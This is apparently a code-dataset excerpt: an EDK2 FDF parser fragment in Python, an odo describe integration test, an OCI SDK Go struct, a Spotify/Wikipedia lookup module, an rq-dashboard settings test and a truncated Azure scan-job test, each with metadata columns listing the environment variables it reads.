EfiSectionObj.BuildNum = self.__Token
if self.__GetAlignment():
if self.__Token not in ("Auto", "8", "16", "32", "64", "128", "512", "1K", "4K", "32K" ,"64K"):
raise Warning("Incorrect alignment '%s'" % self.__Token, self.FileName, self.CurrentLineNumber)
if self.__Token == 'Auto' and (not SectionName == 'PE32') and (not SectionName == 'TE'):
raise Warning("Auto alignment can only be used in PE32 or TE section ", self.FileName, self.CurrentLineNumber)
EfiSectionObj.Alignment = self.__Token
if self.__IsKeyword('RELOCS_STRIPPED') or self.__IsKeyword('RELOCS_RETAINED'):
if self.__SectionCouldHaveRelocFlag(EfiSectionObj.SectionType):
if self.__Token == 'RELOCS_STRIPPED':
EfiSectionObj.KeepReloc = False
else:
EfiSectionObj.KeepReloc = True
if Obj.KeepReloc != None and Obj.KeepReloc != EfiSectionObj.KeepReloc:
raise Warning("Section type %s has reloc strip flag conflict with Rule At Line %d" % (EfiSectionObj.SectionType, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
else:
raise Warning("Section type %s could not have reloc strip flag At Line %d" % (EfiSectionObj.SectionType, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
if self.__IsToken('|'):
EfiSectionObj.FileExtension = self.__GetFileExtension()
elif self.__GetNextToken():
if self.__Token not in ("}", "COMPAT16", "PE32", "PIC", "TE", "FV_IMAGE", "RAW", "DXE_DEPEX",\
"UI", "VERSION", "PEI_DEPEX", "GUID", "SMM_DEPEX"):
if self.__Token.startswith('PCD'):
self.__UndoToken()
self.__GetNextWord()
if self.__Token == 'PCD':
if not self.__IsToken( "("):
raise Warning("expected '('", self.FileName, self.CurrentLineNumber)
PcdPair = self.__GetNextPcdName()
if not self.__IsToken( ")"):
raise Warning("expected ')'", self.FileName, self.CurrentLineNumber)
self.__Token = 'PCD('+PcdPair[1]+'.'+PcdPair[0]+')'
EfiSectionObj.FileName = self.__Token
else:
self.__UndoToken()
else:
raise Warning("expected section file name At Line ", self.FileName, self.CurrentLineNumber)
Obj.SectionList.append(EfiSectionObj)
return True
## __RuleSectionCouldBeOptional() method
#
# Get whether a section could be optional
#
# @param self The object pointer
# @param SectionType The section type to check
# @retval True section could be optional
# @retval False section never optional
#
def __RuleSectionCouldBeOptional(self, SectionType):
if SectionType in ("DXE_DEPEX", "UI", "VERSION", "PEI_DEPEX", "RAW", "SMM_DEPEX"):
return True
else:
return False
## __RuleSectionCouldHaveBuildNum() method
#
# Get whether a section could have build number information
#
# @param self The object pointer
# @param SectionType The section type to check
# @retval True section could have build number information
# @retval False section never have build number information
#
def __RuleSectionCouldHaveBuildNum(self, SectionType):
if SectionType in ("VERSION"):
return True
else:
return False
## __RuleSectionCouldHaveString() method
#
# Get whether a section could have string
#
# @param self The object pointer
# @param SectionType The section type to check
# @retval True section could have string
# @retval False section never have string
#
def __RuleSectionCouldHaveString(self, SectionType):
if SectionType in ("UI", "VERSION"):
return True
else:
return False
## __CheckRuleSectionFileType() method
#
# Get whether a section matches a file type
#
# @param self The object pointer
# @param SectionType The section type to check
# @param FileType The file type to check
#
def __CheckRuleSectionFileType(self, SectionType, FileType):
if SectionType == "COMPAT16":
if FileType not in ("COMPAT16", "SEC_COMPAT16"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "PE32":
if FileType not in ("PE32", "SEC_PE32"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "PIC":
if FileType not in ("PIC", "PIC"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "TE":
if FileType not in ("TE", "SEC_TE"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "RAW":
if FileType not in ("BIN", "SEC_BIN", "RAW", "ASL", "ACPI"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "DXE_DEPEX" or SectionType == "SMM_DEPEX":
if FileType not in ("DXE_DEPEX", "SEC_DXE_DEPEX", "SMM_DEPEX"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "UI":
if FileType not in ("UI", "SEC_UI"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "VERSION":
if FileType not in ("VERSION", "SEC_VERSION"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "PEI_DEPEX":
if FileType not in ("PEI_DEPEX", "SEC_PEI_DEPEX"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "GUID":
if FileType not in ("PE32", "SEC_GUID"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
## __GetRuleEncapsulationSection() method
#
# Get encapsulation section for Rule
#
# @param self The object pointer
# @param Rule for whom section is got
# @retval True Successfully find section statement
# @retval False Not able to find section statement
#
def __GetRuleEncapsulationSection(self, Rule):
if self.__IsKeyword( "COMPRESS"):
Type = "PI_STD"
if self.__IsKeyword("PI_STD") or self.__IsKeyword("PI_NONE"):
Type = self.__Token
if not self.__IsToken("{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
CompressSectionObj = CompressSection.CompressSection()
CompressSectionObj.CompType = Type
# Recursive sections...
while True:
IsEncapsulate = self.__GetRuleEncapsulationSection(CompressSectionObj)
IsLeaf = self.__GetEfiSection(CompressSectionObj)
if not IsEncapsulate and not IsLeaf:
break
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
Rule.SectionList.append(CompressSectionObj)
return True
elif self.__IsKeyword( "GUIDED"):
GuidValue = None
if self.__GetNextGuid():
GuidValue = self.__Token
if self.__IsKeyword( "$(NAMED_GUID)"):
GuidValue = self.__Token
AttribDict = self.__GetGuidAttrib()
if not self.__IsToken("{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
GuidSectionObj = GuidSection.GuidSection()
GuidSectionObj.NameGuid = GuidValue
GuidSectionObj.SectionType = "GUIDED"
GuidSectionObj.ProcessRequired = AttribDict["PROCESSING_REQUIRED"]
GuidSectionObj.AuthStatusValid = AttribDict["AUTH_STATUS_VALID"]
# Efi sections...
while True:
IsEncapsulate = self.__GetRuleEncapsulationSection(GuidSectionObj)
IsLeaf = self.__GetEfiSection(GuidSectionObj)
if not IsEncapsulate and not IsLeaf:
break
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
Rule.SectionList.append(GuidSectionObj)
return True
return False
## __GetVtf() method
#
# Get VTF section contents and store its data into VTF list of self.Profile
#
# @param self The object pointer
# @retval True Successfully find a VTF
# @retval False Not able to find a VTF
#
def __GetVtf(self):
if not self.__GetNextToken():
return False
S = self.__Token.upper()
if S.startswith("[") and not S.startswith("[VTF."):
if not S.startswith("[RULE.") and not S.startswith("[OPTIONROM."):
raise Warning("Unknown section or section appear sequence error (The correct sequence should be [FD.], [FV.], [Capsule.], [VTF.], [Rule.], [OptionRom.])", self.FileName, self.CurrentLineNumber)
self.__UndoToken()
return False
self.__UndoToken()
if not self.__IsToken("[VTF.", True):
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
print 'Parsing String: %s in File %s, At line: %d, Offset Within Line: %d' \
% (self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine :], FileLineTuple[0], FileLineTuple[1], self.CurrentOffsetWithinLine)
raise Warning("expected [VTF.] At Line ", self.FileName, self.CurrentLineNumber)
if not self.__SkipToToken("."):
raise Warning("expected '.' At Line ", self.FileName, self.CurrentLineNumber)
Arch = self.__SkippedChars.rstrip(".").upper()
if Arch not in ("IA32", "X64", "IPF", "ARM", "AARCH64"):
raise Warning("Unknown Arch At line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextWord():
raise Warning("expected VTF name At Line ", self.FileName, self.CurrentLineNumber)
Name = self.__Token.upper()
VtfObj = Vtf.Vtf()
VtfObj.UiName = Name
VtfObj.KeyArch = Arch
if self.__IsToken(","):
if not self.__GetNextWord():
raise Warning("expected Arch list At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token.upper() not in ("IA32", "X64", "IPF", "ARM", "AARCH64"):
raise Warning("Unknown Arch At line ", self.FileName, self.CurrentLineNumber)
VtfObj.ArchList = self.__Token.upper()
if not self.__IsToken( "]"):
raise Warning("expected ']' At Line ", self.FileName, self.CurrentLineNumber)
if self.__IsKeyword("IA32_RST_BIN"):
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Reset file At Line ", self.FileName, self.CurrentLineNumber)
VtfObj.ResetBin = self.__Token
while self.__GetComponentStatement(VtfObj):
pass
self.Profile.VtfList.append(VtfObj)
return True
## __GetComponentStatement() method
#
# Get components in VTF
#
# @param self The object pointer
# @param VtfObj for whom component is got
# @retval True Successfully find a component
# @retval False Not able to find a component
#
def __GetComponentStatement(self, VtfObj):
if not self.__IsKeyword("COMP_NAME"):
return False
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextWord():
raise Warning("expected Component Name At Line ", self.FileName, self.CurrentLineNumber)
CompStatementObj = ComponentStatement.ComponentStatement()
CompStatementObj.CompName = self.__Token
if not self.__IsKeyword("COMP_LOC"):
raise Warning("expected COMP_LOC At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
CompStatementObj.CompLoc = ""
if self.__GetNextWord():
CompStatementObj.CompLoc = self.__Token
if self.__IsToken('|'):
if not self.__GetNextWord():
raise Warning("Expected Region Name At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token not in ("F", "N", "S"): #, "H", "L", "PH", "PL"): not support
raise Warning("Unknown location type At line ", self.FileName, self.CurrentLineNumber)
CompStatementObj.FilePos = self.__Token
else:
self.CurrentLineNumber += 1
self.CurrentOffsetWithinLine = 0
if not self.__IsKeyword("COMP_TYPE"):
raise Warning("expected COMP_TYPE At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Component type At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token not in ("FIT", "PAL_B", "PAL_A", "OEM"):
if not self.__Token.startswith("0x") or len(self.__Token) < 3 or len(self.__Token) > 4 or \
not self.__HexDigit(self.__Token[2]) or not self.__HexDigit(self.__Token[-1]):
raise Warning("Unknown location type At line ", self.FileName, self.CurrentLineNumber)
CompStatementObj.CompType = self.__Token
if not self.__IsKeyword("COMP_VER"):
raise Warning("expected COMP_VER At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Component version At Line ", self.FileName, self.CurrentLineNumber)
Pattern = re.compile('-$|[0-9]{0,1}[0-9]{1}\.[0-9]{0,1}[0-9]{1}')
if Pattern.match(self.__Token) == None:
raise Warning("Unknown version format At line ", self.FileName, self.CurrentLineNumber)
CompStatementObj.CompVer = self.__Token
if not self.__IsKeyword("COMP_CS"):
raise Warning("expected COMP_CS At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Component CS At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token not in ("1", "0"):
raise Warning("Unknown Component CS At line ", self.FileName, self.CurrentLineNumber)
CompStatementObj.CompCs = self.__Token
if not self.__IsKeyword("COMP_BIN"):
raise Warning("expected COMP_BIN At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Component file At Line ", self.FileName, self.CurrentLineNumber)
CompStatementObj.CompBin = self.__Token
if not self.__IsKeyword("COMP_SYM"):
raise Warning("expected COMP_SYM At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Component symbol file At Line ", self.FileName, self.CurrentLineNumber)
CompStatementObj.CompSym = self.__Token
if not self.__IsKeyword("COMP_SIZE"):
raise Warning("expected COMP_SIZE At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if self.__IsToken("-"):
CompStatementObj.CompSize = self.__Token
elif self.__GetNextDecimalNumber():
CompStatementObj.CompSize = self.__Token
elif self.__GetNextHexNumber():
CompStatementObj.CompSize = self.__Token
else:
raise Warning("Unknown size At line ", self.FileName, self.CurrentLineNumber)
VtfObj.ComponentStatementList.append(CompStatementObj)
return True
## __GetFvInFd() method
#
# Get FV list contained in FD
#
# @param self The object pointer
# @param FdName FD name
# @retval FvList list of FV in FD
#
def __GetFvInFd (self, FdName):
FvList = []
if FdName.upper() in self.Profile.FdDict.keys():
FdObj = self.Profile.FdDict[FdName.upper()]
for elementRegion in FdObj.RegionList:
if elementRegion.RegionType == 'FV':
for elementRegionData in elementRegion.RegionDataList:
if elementRegionData != None and elementRegionData.upper() not in FvList:
FvList.append(elementRegionData.upper())
return FvList
## __GetReferencedFdFvTuple() method
#
# Get FD and FV list referenced by a FFS file
#
# @param self The object pointer
# @param FfsFile contains sections to be searched
# @param RefFdList referenced FD by section
# @param RefFvList referenced FV by section
#
def __GetReferencedFdFvTuple(self, FvObj, RefFdList = [], RefFvList = []):
for FfsObj in FvObj.FfsList:
if isinstance(FfsObj, FfsFileStatement.FileStatement):
if FfsObj.FvName != None and FfsObj.FvName.upper() not in RefFvList:
RefFvList.append(FfsObj.FvName.upper())
elif FfsObj.FdName != None and FfsObj.FdName.upper() not in RefFdList:
RefFdList.append(FfsObj.FdName.upper())
else:
self.__GetReferencedFdFvTupleFromSection(FfsObj, RefFdList, RefFvList)
## __GetReferencedFdFvTupleFromSection() method
#
# Get FD and FV list referenced by a FFS section
#
# @param self The object pointer
# @param FfsFile contains sections to be searched
# @param FdList referenced FD by section
# @param FvList referenced FV by section
#
def __GetReferencedFdFvTupleFromSection(self, FfsFile, FdList = [], FvList = []):
SectionStack = []
SectionStack.extend(FfsFile.SectionList)
while SectionStack != []:
SectionObj = SectionStack.pop()
if isinstance(SectionObj, FvImageSection.FvImageSection):
if SectionObj.FvName != None and SectionObj.FvName.upper() not in FvList:
FvList.append(SectionObj.FvName.upper())
if SectionObj.Fv != None and SectionObj.Fv.UiFvName != None and SectionObj.Fv.UiFvName.upper() not in FvList:
FvList.append(SectionObj.Fv.UiFvName.upper())
self.__GetReferencedFdFvTuple(SectionObj.Fv, FdList, FvList)
if isinstance(SectionObj, CompressSection.CompressSection) or isinstance(SectionObj, GuidSection.GuidSection):
SectionStack.extend(SectionObj.SectionList)
## CycleReferenceCheck() method
#
# Check whether cycle reference exists in FDF
#
# @param self The object pointer
# @retval True cycle reference exists
# @retval False Not exists cycle reference
#
def CycleReferenceCheck(self):
CycleRefExists = False
try:
for FvName in self.Profile.FvDict.keys():
LogStr = "Cycle Reference Checking for FV: %s\n" % FvName
RefFvStack = []
RefFvStack.append(FvName)
FdAnalyzedList = []
while RefFvStack != []:
FvNameFromStack = RefFvStack.pop()
if FvNameFromStack.upper() in self.Profile.FvDict.keys():
FvObj = self.Profile.FvDict[FvNameFromStack.upper()]
else:
continue
RefFdList = []
RefFvList = []
self.__GetReferencedFdFvTuple(FvObj, RefFdList, RefFvList)
for RefFdName in RefFdList:
if RefFdName in FdAnalyzedList:
continue
LogStr += "FD %s is referenced by FV %s\n" % (RefFdName, FvNameFromStack)
FvInFdList = self.__GetFvInFd(RefFdName)
if FvInFdList != []:
LogStr += "FD %s contains FV: " % RefFdName
for FvObj in FvInFdList:
LogStr += FvObj
LogStr += ' \n'
if FvObj not in RefFvStack:
RefFvStack.append(FvObj)
if FvName in RefFvStack:
CycleRefExists = True
raise Warning(LogStr)
FdAnalyzedList.append(RefFdName)
for RefFvName in RefFvList:
LogStr += "FV %s is referenced by FV %s\n" % (RefFvName, FvNameFromStack)
if RefFvName not in RefFvStack:
RefFvStack.append(RefFvName)
if FvName in RefFvStack:
CycleRefExists = True
raise Warning(LogStr)
except Warning:
print LogStr
finally:
return CycleRefExists
if __name__ == "__main__":
import sys
try:
test_file = sys.argv[1]
except IndexError, v:
print "Usage: %s filename" % sys.argv[0]
sys.exit(1)
parser = FdfParser(test_file)
try:
parser.ParseFile()
parser.CycleReferenceCheck()
except Warning, X:
print X.message
else:
print "Success!"
|
[] |
[] |
[
"WORKSPACE"
] |
[]
|
["WORKSPACE"]
|
python
| 1 | 0 | |
tests/integration/devfile/cmd_devfile_describe_test.go
|
package devfile
import (
"os"
"path/filepath"
devfilepkg "github.com/devfile/api/v2/pkg/devfile"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"github.com/openshift/odo/pkg/component"
"github.com/openshift/odo/tests/helper"
"github.com/tidwall/gjson"
)
var _ = Describe("odo devfile describe command tests", func() {
var commonVar helper.CommonVar
// This is run before every Spec (It)
var _ = BeforeEach(func() {
if os.Getenv("KUBERNETES") != "true" {
Skip("Plain Kubernetes scenario only, skipping")
}
commonVar = helper.CommonBeforeEach()
})
// This is run after every Spec (It)
var _ = AfterEach(func() {
helper.CommonAfterEach(commonVar)
})
When("a component is created with storage and url", func() {
var (
compName = "cmp-git"
compType = "django"
)
BeforeEach(func() {
// Using Django example here because it helps to distinguish between language and projectType.
// With nodejs, both projectType and language is nodejs, but with python-django, django is the projectType and python is the language
helper.CopyExample(filepath.Join("source", "python"), commonVar.Context)
helper.Cmd("odo", "create", "python-django", compName, "--project", commonVar.Project, "--context", commonVar.Context, "--app", "testing").ShouldPass()
helper.Cmd("odo", "url", "create", "url-1", "--port", "3000", "--host", "example.com", "--context", commonVar.Context).ShouldPass()
helper.Cmd("odo", "url", "create", "url-2", "--port", "4000", "--host", "example.com", "--context", commonVar.Context).ShouldPass()
helper.Cmd("odo", "storage", "create", "storage-1", "--size", "1Gi", "--path", "/data1", "--context", commonVar.Context).ShouldPass()
})
AfterEach(func() {
// odo delete requires changing directory because it does not work as intended with --context
// TODO: Remove helper.Chdir after these issues are closed - https://github.com/openshift/odo/issues/4451
// TODO: and https://github.com/openshift/odo/issues/4135
helper.Chdir(commonVar.Context)
helper.Cmd("odo", "delete", "-f", "--all").ShouldPass()
})
var checkDescribe = func(status string) {
cmpDescribe := helper.Cmd("odo", "describe", "--context", commonVar.Context).ShouldPass().Out()
helper.MatchAllInOutput(cmpDescribe, []string{
compName,
compType,
"url-1",
"url-2",
"storage-1",
})
By("checking describe works with json output", func() {
cmpDescribeJSON, err := helper.Unindented(helper.Cmd("odo", "describe", "-o", "json", "--context", commonVar.Context).ShouldPass().Out())
Expect(err).Should(BeNil())
valuesDes := gjson.GetMany(cmpDescribeJSON, "kind", "metadata.name", "status.state", "spec.urls.items.0.metadata.name", "spec.urls.items.0.spec.host", "spec.urls.items.1.metadata.name", "spec.urls.items.1.spec.host", "spec.storages.items.0.metadata.name", "spec.storages.items.0.spec.containerName")
expectedDes := []string{"Component", compName, status, "url-1", "url-1.example.com", "url-2", "url-2.example.com", "storage-1", "py-web"}
Expect(helper.GjsonMatcher(valuesDes, expectedDes)).To(Equal(true))
})
By("checking describe with component name works", func() {
// odo should describe not-pushed component if component name is given.
helper.Cmd("odo", "describe", compName, "--context", commonVar.Context).ShouldPass()
Expect(cmpDescribe).To(ContainSubstring(compName))
})
}
It("should describe the component correctly", func() {
checkDescribe("Not Pushed")
})
It("should describe the component correctly from a disconnected cluster", func() {
By("getting human readable output", func() {
output := helper.Cmd("odo", "describe", "--context", commonVar.Context).WithEnv("KUBECONFIG=/no/path", "GLOBALODOCONFIG="+os.Getenv("GLOBALODOCONFIG")).ShouldPass().Out()
helper.MatchAllInOutput(output, []string{compName, compType})
})
By("getting json output", func() {
output := helper.Cmd("odo", "describe", "--context", commonVar.Context, "-o", "json").WithEnv("KUBECONFIG=/no/path", "GLOBALODOCONFIG="+os.Getenv("GLOBALODOCONFIG")).ShouldPass().Out()
values := gjson.GetMany(output, "kind", "metadata.name", "spec.type", "status.state")
Expect(helper.GjsonMatcher(values, []string{"Component", compName, compType, "Unknown"})).To(Equal(true))
})
})
When("the component is pushed", func() {
BeforeEach(func() {
helper.Cmd("odo", "push", "--context", commonVar.Context).ShouldPass()
})
It("should describe the component correctly", func() {
checkDescribe("Pushed")
})
})
})
When("devfile has missing metadata", func() {
// Note: We will be using SpringBoot example here because it helps to distinguish between language and projectType.
// In terms of SpringBoot, spring is the projectType and java is the language; see https://github.com/openshift/odo/issues/4815
var metadata devfilepkg.DevfileMetadata
// checkDescribe checks the describe output (both normal and json) to see if it contains the expected componentType
var checkDescribe = func(componentType string) {
By("checking the human readable output", func() {
stdOut := helper.Cmd("odo", "describe", "--context", commonVar.Context).ShouldPass().Out()
Expect(stdOut).To(ContainSubstring(componentType))
})
By("checking the json output", func() {
stdOut := helper.Cmd("odo", "describe", "--context", commonVar.Context, "-o", "json").ShouldPass().Out()
Expect(gjson.Get(stdOut, "spec.type").String()).To(Equal(componentType))
})
}
When("projectType is missing", func() {
BeforeEach(func() {
helper.CopyAndCreate(filepath.Join("source", "devfiles", "springboot", "project"), filepath.Join("source", "devfiles", "springboot", "devfile-with-missing-projectType-metadata.yaml"), commonVar.Context)
metadata = helper.GetMetadataFromDevfile(filepath.Join(commonVar.Context, "devfile.yaml"))
})
It("should show the language for 'Type' in odo describe", func() {
checkDescribe(metadata.Language)
})
When("the component is pushed", func() {
BeforeEach(func() {
helper.Cmd("odo", "push", "--context", commonVar.Context).ShouldPass().Out()
})
It("should show the language for 'Type' in odo describe", func() {
checkDescribe(metadata.Language)
})
})
})
When("projectType and language is missing", func() {
BeforeEach(func() {
helper.CopyAndCreate(filepath.Join("source", "devfiles", "springboot", "project"), filepath.Join("source", "devfiles", "springboot", "devfile-with-missing-projectType-and-language-metadata.yaml"), commonVar.Context)
metadata = helper.GetMetadataFromDevfile(filepath.Join(commonVar.Context, "devfile.yaml"))
})
It("should show 'Not available' for 'Type' in odo describe", func() {
checkDescribe(component.NotAvailable)
})
When("the component is pushed", func() {
BeforeEach(func() {
helper.Cmd("odo", "push", "--context", commonVar.Context).ShouldPass().Out()
})
It("should show 'Not available' for 'Type' in odo describe", func() {
checkDescribe(component.NotAvailable)
})
})
})
})
})
|
[
"\"KUBERNETES\"",
"\"GLOBALODOCONFIG\"",
"\"GLOBALODOCONFIG\""
] |
[] |
[
"KUBERNETES",
"GLOBALODOCONFIG"
] |
[]
|
["KUBERNETES", "GLOBALODOCONFIG"]
|
go
| 2 | 0 | |
waas/work_request_log_entry.go
|
// Copyright (c) 2016, 2018, 2021, Oracle and/or its affiliates. All rights reserved.
// This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
// Code generated. DO NOT EDIT.
// Web Application Acceleration and Security Services API
//
// OCI Web Application Acceleration and Security Services
//
package waas
import (
"github.com/erikcai/oci-go-sdk/v33/common"
)
// WorkRequestLogEntry A log message for a work request.
type WorkRequestLogEntry struct {
// The log message.
Message *string `mandatory:"false" json:"message"`
// The date and time the work request log event happend, expressed in RFC 3339 timestamp format.
Timestamp *common.SDKTime `mandatory:"false" json:"timestamp"`
}
func (m WorkRequestLogEntry) String() string {
return common.PointerString(m)
}
|
[] |
[] |
[] |
[]
|
[]
|
go
| null | null | null |
apis/spotify.py
|
import requests
from bs4 import BeautifulSoup, SoupStrainer
import spotipy
from spotipy.oauth2 import SpotifyClientCredentials
from typing import Dict, Optional
from apis.wikipedia import get_short_details, search_google, WikiUrlTitle
from constants import wikipedia_url
import os
from urllib.parse import urlparse
spotify_client_id = os.getenv('SPOTIFY_CLIENT_ID')
spotify_client_skey = os.getenv('SPOTIFY_CLIENT_SKEY')
spotify = spotipy.Spotify(
client_credentials_manager=SpotifyClientCredentials(
spotify_client_id, spotify_client_skey
)
)
def parse_wiki_url(title: str, content: str, creator: Optional[str] = None) -> str:
if content == WikiUrlTitle.artist:
title = title + ' musician wikipedia'
elif content == WikiUrlTitle.show:
title = title + ' podcast wikipedia'
elif content == WikiUrlTitle.track:
title = title + ' ' + creator + ' song wikipedia'
url = search_google(title)
return url
def parse_data_from_wiki(url: str) -> Dict:
return get_short_details(url)
def spotify_get(url: str) -> Dict:
api_data = {}
parse_url = urlparse(url)
spotify_id = parse_url.path.split('/')[2]
spotify_type = parse_url.path.split('/')[1]
uri = "spotify:%s:%s" % (spotify_type, spotify_id)
if spotify_type == "artist": #wiki data added
artist = spotify.artist(spotify_id)
artist_album = spotify.artist_albums(uri, album_type='album', limit= 5)
artist_top_tracks = spotify.artist_top_tracks(uri)
api_data["artist_details"] = artist
api_data["artist_albums"] = artist_album
api_data["top_tracks"] = artist_top_tracks['tracks']
wiki_url = parse_wiki_url(api_data['artist_details']['name'] , WikiUrlTitle.artist)
api_data['wiki_data'] = parse_data_from_wiki(wiki_url)
elif spotify_type == "playlist":
playlist = spotify.playlist(uri)
playlist_items = spotify.playlist_tracks(uri, limit=5)
api_data["playlist_details"] = playlist
api_data["playlist_tracks"] = playlist_items
elif spotify_type == "show": #wiki data added
show = spotify.show(uri, market="US")
show_episodes = spotify.show_episodes(uri, market="US")
api_data["show_details"] = show
api_data["episodes"] = show_episodes
wiki_url = parse_wiki_url(api_data["show_details"]['name'] , WikiUrlTitle.show)
api_data['wiki_data'] = parse_data_from_wiki(wiki_url)
elif spotify_type == "track": #wiki data added
track = spotify.track(uri)
api_data["track_details"] = track
wiki_url = parse_wiki_url(api_data['track_details']['name'], WikiUrlTitle.track, api_data['track_details']['artists'][0]['name'])
api_data['wiki_data'] = parse_data_from_wiki(wiki_url)
elif spotify_type == "episode":
episode = spotify.episode(uri, market="US")
api_data["episode_details"] = episode
elif spotify_type == "album":
album = spotify.album(uri)
api_data['album_details'] = album
return api_data
|
[] |
[] |
[
"SPOTIFY_CLIENT_SKEY",
"SPOTIFY_CLIENT_ID"
] |
[]
|
["SPOTIFY_CLIENT_SKEY", "SPOTIFY_CLIENT_ID"]
|
python
| 2 | 0 | |
vent/core/rq_dashboard/test_rq_dashboard.py
|
import os
def test_rq_dash_settings():
""" Tests the rq dashboard environment variable settings """
os.environ['DASH_PREFIX'] = "test"
os.environ['REMOTE_REDIS_HOST'] = "test"
os.environ['REMOTE_REDIS_PORT'] = "test"
os.environ['REMOTE_REDIS_PSWD'] = "test"
import rq_dash_settings
|
[] |
[] |
[
"DASH_PREFIX",
"REMOTE_REDIS_HOST",
"REMOTE_REDIS_PSWD",
"REMOTE_REDIS_PORT"
] |
[]
|
["DASH_PREFIX", "REMOTE_REDIS_HOST", "REMOTE_REDIS_PSWD", "REMOTE_REDIS_PORT"]
|
python
| 4 | 0 | |
components/nodemanager-service/tests/scanjob_azure_api_integration_test.go
|
package manager
import (
"context"
"os"
"testing"
"time"
"github.com/chef/automate/api/interservice/compliance/common"
"github.com/chef/automate/api/interservice/compliance/jobs"
"github.com/chef/automate/api/interservice/compliance/reporting"
"github.com/chef/automate/api/interservice/nodemanager/manager"
"github.com/chef/automate/api/interservice/nodemanager/nodes"
"github.com/chef/automate/components/nodemanager-service/tests/mgrtesthelpers"
"github.com/golang/protobuf/ptypes"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/status"
)
func TestAzureAPIScanJob(t *testing.T) {
if !mgrtesthelpers.CheckForCreds("azure") {
t.Log("azure credentials missing; aborting")
t.FailNow()
}
t.Log("Running Azure-API scan job test.")
ctx := context.Background()
cmpConn, err := mgrtesthelpers.GetComplianceConn()
require.NoError(t, err)
defer cmpConn.Close()
mgrConn, err := mgrtesthelpers.GetManagerConn()
require.NoError(t, err)
defer mgrConn.Close()
t.Log("connection to grpc successful")
// setup clients
mgrClient := manager.NewNodeManagerServiceClient(mgrConn)
jobsClient := jobs.NewJobsServiceClient(cmpConn)
reportingClient := reporting.NewReportingServiceClient(cmpConn)
nodesClient := nodes.NewNodesServiceClient(mgrConn)
// timestamp of now
now := time.Now()
originalReportingNodes, err := reportingClient.ListNodes(ctx, &reporting.Query{})
require.NoError(t, err)
t.Logf("Starting test at %s with %d nodes found in reporting", now, originalReportingNodes.GetTotal())
// delete all existing azure-api managers, just in case
mgrsList, err := mgrClient.List(ctx, &manager.Query{})
require.NoError(t, err)
for _, mgr := range mgrsList.GetManagers() {
if mgr.Type == "azure-api" {
_, err = mgrClient.Delete(ctx, &manager.Id{Id: mgr.Id})
assert.Contains(t, []codes.Code{codes.NotFound, codes.OK}, status.Convert(err).Code())
}
}
// create nodemanager
t.Log("Creating azure-api node manager using env creds.")
noCredsAzureMgr := manager.NodeManager{
Name: "my test azure api mgr",
Type: "azure-api",
CredentialData: []*common.Kv{
{Key: "AZURE_CLIENT_ID", Value: os.Getenv("AZURE_CLIENT_ID")},
{Key: "AZURE_CLIENT_SECRET", Value: os.Getenv("AZURE_CLIENT_SECRET")},
{Key: "AZURE_TENANT_ID", Value: os.Getenv("AZURE_TENANT_ID")}},
}
mgrID, err := mgrClient.Create(ctx, &noCredsAzureMgr)
require.NoError(t, err)
require.NotZero(t, len(mgrID.Ids))
// create a job with node manager reference
mgrFilter := jobs.ManagerFilter{
ManagerId: mgrID.GetIds()[0].Id,
